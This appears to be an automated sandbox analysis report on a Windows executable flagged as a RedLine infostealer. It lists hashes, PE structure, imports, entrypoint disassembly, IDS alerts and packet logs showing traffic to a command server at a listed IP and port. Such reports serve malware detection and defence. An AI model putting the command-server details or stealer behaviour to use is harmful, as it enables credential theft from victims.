Entropy (8bit):	7.891666015031055
Encrypted:	false
SSDEEP:	12288:13QfYVK+orvWdcjjs0OzZgN3RV7ib0KnggidUzxF7+wdIbH2TdTkR:81+PejtrN3G0UdiSzxgw+bSM
MD5:	8A9837F38BD2C2ADDA21106E3B75FFA8
SHA1:	D03BC9129AEB9AF731AFD9FD676487592C48FC5B
SHA-256:	FDB3927EBECB2D7611D047BE77C913E6848D24D87EC24D84D76E851839D2FADB
SHA-512:	AC938FFF9572A37A2FB801999FE7A2EE9DC72CE0FB4A4878AA2EF2676E76477AAEB9F6A248B92682425F3DFC911835B757C688FF8DEB5A48AA92CFDBB03161CD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.f..............0..............1... ...@....@.. ....................................@.................................P1..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................1......H........z...f..........h....O..........................................b.(.....(.....s!...}.....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....F.{....r...po....F.{....r...po....F.{....r!..po....F.{....r3..po......{....o ....{.....{....o....o......{.....o....&.{.....{....o....o....*.0...........o.............o

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.798866224849452
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	owKQ0b029a.exe
File size:	752'105 bytes
MD5:	5404b47556a2e1e9eb2f5da481002616
SHA1:	e3a45833fecb92ff8998fc6d4a13c9b80afe87db
SHA256:	9c6f132ef4142409bd7a1448d3dc52f774e9e33919031dac82f2afb27083945f
SHA512:	f3ff71f4a5637845e482e5d28656b2c7a502922ffdd599def1f243774820adc16c7de5a6804f2acff497568c93cdf180259628f2784da9dd16b9cc993e41edaf
SSDEEP:	12288:eYQyrJBxjjmHI8/fRRCtRazozhlzs+WxuEvhxYInrLQ3MqzNF7+wdIH8dZs3:eYlJBxjCHdRRSRNzfzs+0uE5xYwrLQ8b
TLSH:	CCF40211B6C28071D1731A341EF6EB71AA7DBC601F38DA5FD3845B6C1E305D0BA2AB66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...1...1...1.T;....1.T;..j.1.T;....1.~.....1...2...1...5...1...4...1.......1.......1...0...1.w.4...1.w.1...1.r.....1.w.3...1

File Icon


Icon Hash:	3570b480858580c5

Static PE Info

General

Entrypoint:	0x41248b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C72EA84 [Sun Feb 24 19:03:32 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	c127345c03c7eb109783c6cc61e16834

Entrypoint Preview

Instruction
call 00007FA1E88F0266h
jmp 00007FA1E88EFC23h
cmp ecx, dword ptr [0042F0B8h]
jne 00007FA1E88EFD95h
ret
jmp 00007FA1E88F03DFh
jmp 00007FA1E88F4708h
push ebp
mov ebp, esp
and dword ptr [00460FE0h], 00000000h
sub esp, 28h
push ebx
xor ebx, ebx
inc ebx
or dword ptr [0042F0BCh], ebx
push 0000000Ah
call 00007FA1E890161Eh
test eax, eax
je 00007FA1E88EFF03h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
or dword ptr [0042F0BCh], 02h
xor ecx, ecx
push esi
push edi
mov dword ptr [00460FE0h], ebx
lea edi, dword ptr [ebp-28h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-28h]
mov ecx, dword ptr [ebp-1Ch]
mov dword ptr [ebp-08h], eax
xor ecx, 49656E69h
mov eax, dword ptr [ebp-20h]
xor eax, 6C65746Eh
or ecx, eax
mov eax, dword ptr [ebp-24h]
push 00000001h
xor eax, 756E6547h
or ecx, eax
pop eax
push 00000000h
pop ecx
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
mov dword ptr [edi+0Ch], edx
jne 00007FA1E88EFDD5h
mov eax, dword ptr [ebp-28h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FA1E88EFDB5h
cmp eax, 00020660h
je 00007FA1E88EFDAEh
cmp eax, 00020670h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2d430	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d464	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x5f70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x69000	0x2508	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2bc50	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26678	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x218	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2cb0c	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23403	0x23600	924dddab6e63ba0152c5d94c2b021084	False	0.5854267888692579	data	6.664322509514955	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x9070	0x9200	66d578390f42c9a5ee24297c1d975ae7	False	0.4574593321917808	COM executable for DOS	5.10882492780084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x329f0	0xc00	d01f95684cdb2c981fa2332f83cc9c24	False	0.22688802083333334	data	2.7159229945167196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x62000	0xf4	0x200	3f5d9c4e78af18504690ce2d88ff4a21	False	0.345703125	data	2.150380266078888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x63000	0x5f70	0x6000	0d6d585593dcfe48a0c4ab5974ebbb83	False	0.686279296875	data	6.814594471581196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x69000	0x2508	0x2600	1f2d5d9cc862b23918d2c2c892c0a31b	False	0.7813527960526315	data	6.66943889606044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6406c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65618	0x162c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.906800563777308
RT_DIALOG	0x66c44	0x286	data	English	United States	0.5030959752321982
RT_DIALOG	0x66ecc	0x13a	data	English	United States	0.6050955414012739
RT_DIALOG	0x67008	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x670f4	0x12e	data	English	United States	0.5860927152317881
RT_DIALOG	0x67224	0x338	data	English	United States	0.44538834951456313
RT_DIALOG	0x6755c	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x677b0	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x67994	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x67b60	0x1ee	data	English	United States	0.451417004048583
RT_STRING	0x67d50	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x67e98	0x446	data	English	United States	0.340036563071298
RT_STRING	0x682e0	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x68448	0x120	data	English	United States	0.5451388888888888
RT_STRING	0x68568	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x68674	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x68730	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x68808	0x14	data			1.05
RT_MANIFEST	0x6881c	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-16T19:57:25.200037+0200	TCP	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	55615	49714	185.222.57.67	192.168.2.5
2024-07-16T19:57:22.155298+0200	TCP	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	55615	49714	185.222.57.67	192.168.2.5
2024-07-16T19:57:25.200037+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	55615	49714	185.222.57.67	192.168.2.5
2024-07-16T19:57:16.176487+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49711	40.68.123.157	192.168.2.5
2024-07-16T19:57:15.229510+0200	TCP	2835929	ETPRO POLICY External IP Address Lookup via api.ip .sb	49710	443	192.168.2.5	104.26.12.31
2024-07-16T19:57:17.363146+0200	TCP	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	55615	49709	185.222.57.67	192.168.2.5
2024-07-16T19:57:23.072310+0200	TCP	2833693	ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb))	443	49721	104.26.12.31	192.168.2.5
2024-07-16T19:57:03.687918+0200	TCP	2840787	ETPRO HUNTING Request for config.json	49708	443	192.168.2.5	184.28.90.27
2024-07-16T19:57:14.566741+0200	TCP	2835930	ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI)	49710	443	192.168.2.5	104.26.12.31
2024-07-16T19:57:13.184707+0200	TCP	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	55615	49709	185.222.57.67	192.168.2.5
2024-07-16T19:57:54.382158+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49724	40.68.123.157	192.168.2.5
2024-07-16T19:57:13.586420+0200	UDP	2835928	ETPRO POLICY External IP Address Lookup DNS Query (api .ip .sb)	64713	53	192.168.2.5	1.1.1.1
2024-07-16T19:57:17.781669+0200	TCP	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	49720	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:08.017874+0200	TCP	2849662	ETPRO MALWARE RedLine - CheckConnect Request	49709	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:18.648163+0200	TCP	2848200	ETPRO MALWARE RedLine - GetUpdates Request	49720	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:23.070316+0200	TCP	2835930	ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI)	49721	443	192.168.2.5	104.26.12.31
2024-07-16T19:57:25.605724+0200	TCP	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	49722	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:13.545314+0200	TCP	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	49709	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:14.570164+0200	TCP	2833693	ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb))	443	49710	104.26.12.31	192.168.2.5
2024-07-16T19:57:26.869631+0200	TCP	2848200	ETPRO MALWARE RedLine - GetUpdates Request	49723	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:22.511032+0200	TCP	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	49714	55615	192.168.2.5	185.222.57.67
2024-07-16T19:57:23.487832+0200	TCP	2835929	ETPRO POLICY External IP Address Lookup via api.ip .sb	49721	443	192.168.2.5	104.26.12.31
2024-07-16T19:57:16.674149+0200	TCP	2849662	ETPRO MALWARE RedLine - CheckConnect Request	49714	55615	192.168.2.5	185.222.57.67

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 16, 2024 19:57:07.354465961 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:07.359448910 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:07.359536886 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:07.377110004 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:07.382011890 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:07.721196890 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:07.726336002 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:07.970293999 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:08.017874002 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:08.102786064 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:08.174113989 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:13.179508924 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:13.184706926 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.352993965 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.353168964 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:13.358488083 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545198917 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545242071 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545260906 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545314074 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:13.545336008 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545345068 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545353889 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:13.545396090 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:15.993275881 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:15.998869896 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:15.999001980 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:16.014492989 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:16.023339033 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:16.361804962 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:16.367582083 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:16.616719961 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:16.674149036 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:16.749912977 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:16.799112082 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.357799053 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.361056089 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.363146067 CEST	55615	49709	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.363238096 CEST	49709	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.365993977 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.367665052 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.370488882 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.375490904 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.724366903 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.733033895 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733052015 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733208895 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733256102 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.733335972 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733341932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733355045 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733360052 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733366013 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733377934 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733380079 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.733383894 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.733400106 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.733449936 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.740551949 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740557909 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740562916 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740567923 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740571976 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740577936 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.740631104 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.740669966 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.781495094 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.781668901 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.805888891 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.806088924 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811428070 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811501026 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811531067 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811568022 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811649084 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811721087 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811769962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811784029 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811872005 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811883926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811897039 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.811975002 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.811995029 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812007904 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812057018 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812108994 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812144995 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812159061 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812166929 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812186956 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812196016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812199116 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812261105 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812268019 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812273979 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812338114 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812382936 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812433004 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812443018 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812503099 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812527895 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812625885 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812676907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812690020 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812763929 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812819958 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.812913895 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.812961102 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813060045 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813071966 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813082933 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.813159943 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.813184023 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813292980 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.813332081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813344955 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813410997 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813525915 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.813551903 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.813616991 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.816505909 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.816545010 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.816629887 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.816725016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.816734076 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.816818953 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.816828966 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.816951036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817142010 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817194939 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817198038 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817240000 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817281008 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817281961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817387104 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817430019 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817471981 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817506075 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817544937 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817586899 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817640066 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817698956 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817801952 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.817863941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817877054 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.817986965 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:17.818022013 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.818094015 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:17.818147898 CEST	55615	49720	185.222.57.67	192.168.2.5
